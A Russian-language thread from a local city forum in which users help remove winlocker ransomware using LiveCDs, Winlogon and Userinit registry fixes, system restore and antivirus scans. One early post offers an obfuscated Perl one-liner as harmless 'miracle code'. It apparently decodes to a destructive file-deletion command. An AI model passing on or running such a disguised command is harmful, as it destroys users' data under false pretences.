Перейти к содержанию
  • Реклама

  • Социальные сети



    Новости сайта Лыткарино Online
    на главной странице Яндекса
    добавить на Яндекс
XBOCT

Компьютерные вирусы и антивирусы

Рекомендуемые сообщения


Ты еще и информацию на рабочем столе хранишь?

Может и документы в папке "мои документы"?

Сколько интересного открывается...

А где документы надо хранить, просвети-ка? В корзине? :D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Либителям никсов проще нада:

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Чудо-код и нет забот!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
А где документы надо хранить, просвети-ка? В корзине? :D

Как вариант - да. Самое безопасное место. Ты хоть один вирус знаешь, который атакует корзину? :D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Собсна словил сию неприятную штуковину на комп :cry: ...не даёт сделать вапще ничего и сразу после загрузки пишет оплатите 400 рублей через терминал и далее бла бла бла...в безопасном режиме та же фигня...коды на сайтах тоже не подходят...Систему переустанавливать не хотелось бы, потому что много нужной инфы на харде...кто нить может помочь? С меня есесна причитаеца :bog:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ссылка

пишите на флешку или диск, грузитесь с него, редактируйте реестр

а можно поподробней где именно и что нужно почистить в реестре...а то я в этом деле тёмный лес :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Naves   

вот скачайте и проверьте винчестер на вирусы ссылка

по моей ссылки выше, вообще-то было написано где в реестре править, только непонятно, где брать сам образ диска

год назад какой-то удобной графической утилитой правил реестр может это ссылка

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mike   

связка bartpe с xperegistry решает эту проблему. Могу выложить образ

ЗЫ

ссылка ~170Mb

Изменено пользователем Mike

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

да, винду с диска. антивирус с диска

но у меня после такого сколько я не чистила, прибегая к помощи знакомых все равно пришлось переустанавливать систему.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mike   

Windflower

значит там не только винлокер был... он-то вычищается быстро..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Nimibu   

Разблокирование компьютера при помощи LiveCD

Вам нужен любой LiveCD с возможностью правки реестра

1. Скачайте образ, например: ERD Commander, запишите образ на болванку и загрузитесь с созданного диска

2. Пуск => Выполнить => erdregedit

3. Найдите в реестре и проверьте:

Ветка:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Параметр:

AppInit_DLLs

Содержимое параметра необходимо опубликовать в теме где вам оказывают помощь

Ветка:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Значение ключа Shell должно быть таким Explorer.exe, если значение отличается - исправить на правильное.

Правильное значения для Userinit это:

C:\WINDOWS\system32\userinit.exe,

!!! Внесение неверных данных в реестр не дадут нужно результата, а только навредят. Если не уверены в своих действиях, то лучше проконсультироваться с специалистом.

Снять блок с компа не проблема, но вирь останется сидеть у вас в системе,

поэтому надо обязательно прогнать комп антивирусом с обновленными базами или сделать логи утилитой AVZ (стандартный скрипт 2, 3)

Изменено пользователем Nimibu

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вот только что подобное лечил. Блокиратор. Хотел денег за "просмотр сцен педофилии и чего-то там". И добро б я там был, хоть не так обидно было. :rolleyes: Так нет, лазил , искал GPS прогу под ноут, а словил...

Руки неумелые, поэтому реестр не правил. Тупо загрузился в ERD Commander, а затем сделал откат системы на несколько дней назад, он позволяет. Делал несколько раз, пока не достиг даты, когда все заработало. После перегрузился и проверил систему антивирусом.

Помогло.

До ERD Commander пробовал Касперского , есть у него какой-то анлокер. Трояна он нашел и сказал что удалил, а вот система так и не разблокировалась. И банер оставался висеть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Naves   

попалась тут система с зараженным userinit.exe

правишь HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

с какого-то файла из documents and settings на значение explorer.exe

перезагружаешься, снова появляется страшная надпись, что сейчас все будет удалено, и все данные, и вся система, и весь биос, и даже небо... и вам ничего не поможет. :)

прогнал LiveCD cureit, нашел зараженные файлы в профиле, зараженный userinit.exe в system32 и в dllcache

удалил их

в венду зайти под пользователем конечно не удается.

скопировал userinit.exe с произвольного компа, все заработало.

ЗЫ говорят дочка решила установить прикольный скринсейвер из вконтактега, вот и получили прикольный скринсейвер скачать бесплатно без смс

:)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

пробелма вроде решилась.какой антивирус лучше купить?чтоб уж наверняка

Такого нет в природе...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
timurgin   

пробелма вроде решилась.какой антивирус лучше купить?чтоб уж наверняка

Norton,либо интернет секъюрити либо 360

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


×
Яндекс.Метрика
Лыткарино Online - городской информационно-развлекательный портал, 18+
Контакты | Реклама на сайте
При любом копировании материалов сайта гиперссылка на источник обязательна.